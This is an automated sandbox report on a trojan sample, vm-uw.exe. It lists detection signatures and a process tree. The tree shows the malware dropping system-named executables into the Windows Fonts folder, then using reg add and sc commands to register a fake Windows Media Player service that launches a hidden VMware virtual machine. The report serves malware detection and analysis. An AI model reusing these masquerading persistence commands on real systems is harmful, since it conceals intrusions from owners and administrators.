Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
vm-uw.exe

Overview

General Information

Sample name:vm-uw.exe
Analysis ID:1455404
MD5:78c6129bfd81f88cfb7171caf2d386a1
SHA1:f626224572dea0bc2983e3b3986bd1c1af5533ce
SHA256:aa1ad7c508d497292d1e017b946cc381be204bd641543bcf584da286eb6f685f
Tags:exetrojan
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Potentially malicious time measurement code found
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Uses cmd line tools excessively to alter registry or file data
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Modifies existing windows services
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Process Start Locations
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64
  • vm-uw.exe (PID: 6688 cmdline: "C:\Users\user\Desktop\vm-uw.exe" MD5: 78C6129BFD81F88CFB7171CAF2D386A1)
    • cmd.exe (PID: 5308 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\Fonts\systkm32\vv.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • mode.com (PID: 5272 cmdline: mode con: cols=16 lines=2 MD5: FB615848338231CEBC16E32A3035C3F8)
      • PING.EXE (PID: 5252 cmdline: ping 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • csrss.exe (PID: 2832 cmdline: C:\Windows\Fonts\systkm32\csrss.exe WMPNetworkSxc C:\Windows\Fonts\systkm32\svchost.exe MD5: C43D1B84143FB2561F22E1A2C8FACF53)
      • PING.EXE (PID: 7068 cmdline: ping 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • reg.exe (PID: 6780 cmdline: reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc /v Description /d "Shares Windows Media Player libraries to other networked players and media devices using Universal Plug and Play." /t reg_sz /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 616 cmdline: reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc /v DisplayName /d "Windows Media Player Network Sharing Service." /t reg_sz /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 4868 cmdline: reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc\Parameters MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5960 cmdline: reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc\Parameters /v AppDirectory /d "C:\Windows\Fonts\systkm32" /t reg_sz /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5712 cmdline: reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc\Parameters /v Application /d ""C:\Program Files (x86)\VMware\VMware Workstation\vmware.exe" -x "C:\Windows\Logs\ubu\3333.vmx"" /t reg_sz /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • PING.EXE (PID: 4052 cmdline: ping 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • sc.exe (PID: 4040 cmdline: sc start WMPNetworkSxc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
      • PING.EXE (PID: 6808 cmdline: ping 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • regini.exe (PID: 6748 cmdline: regini 1.ini MD5: C99C3BB423097FCF4990539FC1ED60E3)
    • cmd.exe (PID: 2012 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\HZ~F6EC.tmp.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 1404 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • svchost.exe (PID: 5544 cmdline: C:\Windows\Fonts\systkm32\svchost.exe MD5: 4635935FC972C582632BF45C26BFCB0E)
  • svchost.exe (PID: 7060 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\Fonts\systkm32\csrss.exe WMPNetworkSxc C:\Windows\Fonts\systkm32\svchost.exe, CommandLine: C:\Windows\Fonts\systkm32\csrss.exe WMPNetworkSxc C:\Windows\Fonts\systkm32\svchost.exe, CommandLine|base64offset|contains: Xz(D, Image: C:\Windows\Fonts\systkm32\csrss.exe, NewProcessName: C:\Windows\Fonts\systkm32\csrss.exe, OriginalFileName: C:\Windows\Fonts\systkm32\csrss.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Windows\Fonts\systkm32\vv.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5308, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Fonts\systkm32\csrss.exe WMPNetworkSxc C:\Windows\Fonts\systkm32\svchost.exe, ProcessId: 2832, ProcessName: csrss.exe
Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\vm-uw.exe, ProcessId: 6688, TargetFilename: C:\Windows\Fonts\systkm32\csrss.exe
Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: C:\Windows\Fonts\systkm32\svchost.exe, CommandLine: C:\Windows\Fonts\systkm32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Fonts\systkm32\svchost.exe, NewProcessName: C:\Windows\Fonts\systkm32\svchost.exe, OriginalFileName: C:\Windows\Fonts\systkm32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\Fonts\systkm32\svchost.exe, ProcessId: 5544, ProcessName: svchost.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Windows\Fonts\systkm32\csrss.exe WMPNetworkSxc C:\Windows\Fonts\systkm32\svchost.exe, CommandLine: C:\Windows\Fonts\systkm32\csrss.exe WMPNetworkSxc C:\Windows\Fonts\systkm32\svchost.exe, CommandLine|base64offset|contains: Xz(D, Image: C:\Windows\Fonts\systkm32\csrss.exe, NewProcessName: C:\Windows\Fonts\systkm32\csrss.exe, OriginalFileName: C:\Windows\Fonts\systkm32\csrss.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Windows\Fonts\systkm32\vv.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5308, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Fonts\systkm32\csrss.exe WMPNetworkSxc C:\Windows\Fonts\systkm32\svchost.exe, ProcessId: 2832, ProcessName: csrss.exe
Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: C:\Windows\Fonts\systkm32\csrss.exe WMPNetworkSxc C:\Windows\Fonts\systkm32\svchost.exe, CommandLine: C:\Windows\Fonts\systkm32\csrss.exe WMPNetworkSxc C:\Windows\Fonts\systkm32\svchost.exe, CommandLine|base64offset|contains: Xz(D, Image: C:\Windows\Fonts\systkm32\csrss.exe, NewProcessName: C:\Windows\Fonts\systkm32\csrss.exe, OriginalFileName: C:\Windows\Fonts\systkm32\csrss.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Windows\Fonts\systkm32\vv.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5308, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Fonts\systkm32\csrss.exe WMPNetworkSxc C:\Windows\Fonts\systkm32\svchost.exe, ProcessId: 2832, ProcessName: csrss.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\Fonts\systkm32\svchost.exe, CommandLine: C:\Windows\Fonts\systkm32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Fonts\systkm32\svchost.exe, NewProcessName: C:\Windows\Fonts\systkm32\svchost.exe, OriginalFileName: C:\Windows\Fonts\systkm32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\Fonts\systkm32\svchost.exe, ProcessId: 5544, ProcessName: svchost.exe
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: vm-uw.exeAvira: detected
Source: vm-uw.exeReversingLabs: Detection: 71%
Source: vm-uw.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: vm-uw.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: srvany.pdb source: vm-uw.exe, 00000000.00000003.2113641386.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, vm-uw.exe, 00000000.00000003.2113871549.00000000029F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000012.00000002.2217182264.0000000001001000.00000020.00000001.01000000.00000007.sdmp, svchost.exe, 00000012.00000000.2216197964.0000000001001000.00000020.00000001.01000000.00000007.sdmp, svchost.exe.0.dr
Source: Binary string: srvany.pdbl"U source: vm-uw.exe, 00000000.00000003.2113641386.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, vm-uw.exe, 00000000.00000003.2113871549.00000000029F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2217182264.0000000001001000.00000020.00000001.01000000.00000007.sdmp, svchost.exe, 00000012.00000000.2216197964.0000000001001000.00000020.00000001.01000000.00000007.sdmp, svchost.exe.0.dr
Source: Binary string: H:\Work\haozip\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: vm-uw.exe
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_00224F98 FindFirstFileExW,0_2_00224F98

Networking

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: vm-uw.exeString found in binary or memory: https://haozip.2345.cc/
Source: C:\Windows\Fonts\systkm32\csrss.exeCode function: 9_2_00401070 OpenServiceA,GetLastError,DeleteService,GetLastError,9_2_00401070
Source: C:\Users\user\Desktop\vm-uw.exeFile created: C:\Windows\Fonts\systkm32\Jump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeFile created: C:\Windows\Fonts\systkm32\vv.batJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeFile created: C:\Windows\Fonts\systkm32\csrss.exeJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeFile created: C:\Windows\Fonts\systkm32\svchost.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Fonts\systkm32\1.iniJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_0020F8DE0_2_0020F8DE
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_001F7C900_2_001F7C90
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_001E10000_2_001E1000
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_002130A00_2_002130A0
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_001FA1600_2_001FA160
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_0022720E0_2_0022720E
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_002053060_2_00205306
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_002175E50_2_002175E5
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_001EC6000_2_001EC600
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_0022C6B90_2_0022C6B9
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_0022B6BC0_2_0022B6BC
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_001EE6800_2_001EE680
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_001F68C00_2_001F68C0
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_002159580_2_00215958
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_002189EC0_2_002189EC
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_00217ADE0_2_00217ADE
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_001E3B7E0_2_001E3B7E
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_0022DB440_2_0022DB44
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_00218BEC0_2_00218BEC
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_0022DBFE0_2_0022DBFE
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_0020DC0C0_2_0020DC0C
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_001F2C500_2_001F2C50
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_00217C580_2_00217C58
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_0021FC5D0_2_0021FC5D
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_0022DD1B0_2_0022DD1B
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_00226D600_2_00226D60
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_001F3D500_2_001F3D50
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_00218D8D0_2_00218D8D
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_001F8F600_2_001F8F60
Source: C:\Windows\Fonts\systkm32\svchost.exeCode function: 18_2_0100149318_2_01001493
Source: Joe Sandbox ViewDropped File: C:\Windows\Fonts\systkm32\csrss.exe BBF4C224F9861B2C1F5A1364EE71E38728495B2709621763053B979BA88522F1
Source: vm-uw.exeStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: vm-uw.exeStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: vm-uw.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc /v Description /d "Shares Windows Media Player libraries to other networked players and media devices using Universal Plug and Play." /t reg_sz /f
Source: classification engineClassification label: mal96.troj.evad.winEXE@38/6@0/1
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_001F3F50 FormatMessageW,_wcslen,_wcslen,LocalFree,GetLastError,0_2_001F3F50
Source: C:\Windows\Fonts\systkm32\csrss.exeCode function: CreateServiceA,GetLastError,CloseServiceHandle,9_2_00401000
Source: C:\Users\user\Desktop\vm-uw.exeCode function: 0_2_001E2777 _wcslen,CoCreateInstance,CoCreateInstance,0_2_001E2777
Source: C:\Windows\Fonts\systkm32\svchost.exeCode function: 18_2_01001D2C StartServiceCtrlDispatcherA,GetLastError,ExitProcess,18_2_01001D2C
Source: C:\Windows\Fonts\systkm32\svchost.exeCode function: 18_2_01001D2C StartServiceCtrlDispatcherA,GetLastError,ExitProcess,18_2_01001D2C
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1808:120:WilError_03
Source: C:\Users\user\Desktop\vm-uw.exeFile created: C:\Users\user\AppData\Local\Temp\HZ~F6EC.tmpJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\Fonts\systkm32\vv.bat" "
Source: vm-uw.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\vm-uw.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: vm-uw.exeReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\vm-uw.exeFile read: C:\Users\user\Desktop\vm-uw.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\vm-uw.exe "C:\Users\user\Desktop\vm-uw.exe"
Source: C:\Users\user\Desktop\vm-uw.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\Fonts\systkm32\vv.bat" "
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\vm-uw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\HZ~F6EC.tmp.bat"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com mode con: cols=16 lines=2
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Fonts\systkm32\csrss.exe C:\Windows\Fonts\systkm32\csrss.exe WMPNetworkSxc C:\Windows\Fonts\systkm32\svchost.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc /v Description /d "Shares Windows Media Player libraries to other networked players and media devices using Universal Plug and Play." /t reg_sz /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc /v DisplayName /d "Windows Media Player Network Sharing Service." /t reg_sz /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc\Parameters
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc\Parameters /v AppDirectory /d "C:\Windows\Fonts\systkm32" /t reg_sz /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc\Parameters /v Application /d ""C:\Program Files (x86)\VMware\VMware Workstation\vmware.exe" -x "C:\Windows\Logs\ubu\3333.vmx"" /t reg_sz /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start WMPNetworkSxc
Source: unknownProcess created: C:\Windows\Fonts\systkm32\svchost.exe C:\Windows\Fonts\systkm32\svchost.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regini.exe regini 1.ini
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Users\user\Desktop\vm-uw.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\Fonts\systkm32\vv.bat" "Jump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\HZ~F6EC.tmp.bat"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com mode con: cols=16 lines=2Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Fonts\systkm32\csrss.exe C:\Windows\Fonts\systkm32\csrss.exe WMPNetworkSxc C:\Windows\Fonts\systkm32\svchost.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc /v Description /d "Shares Windows Media Player libraries to other networked players and media devices using Universal Plug and Play." /t reg_sz /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc /v DisplayName /d "Windows Media Player Network Sharing Service." /t reg_sz /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc\ParametersJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc\Parameters /v AppDirectory /d "C:\Windows\Fonts\systkm32" /t reg_sz /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WMPNetworkSxc\Parameters /v Application /d ""C:\Program Files (x86)\VMware\VMware Workstation\vmware.exe" -x "C:\Windows\Logs\ubu\3333.vmx"" /t reg_sz /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start WMPNetworkSxcJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regini.exe regini 1.iniJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2Jump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\vm-uw.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\mode.comSection loaded: ulib.dllJump to behavior
Source: C:\Windows\SysWOW64\mode.comSection loaded: ureg.dllJump to behavior
Source: C:\Windows\SysWOW64\mode.comSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\Fonts\systkm32\csrss.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\Fonts\systkm32\svchost.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
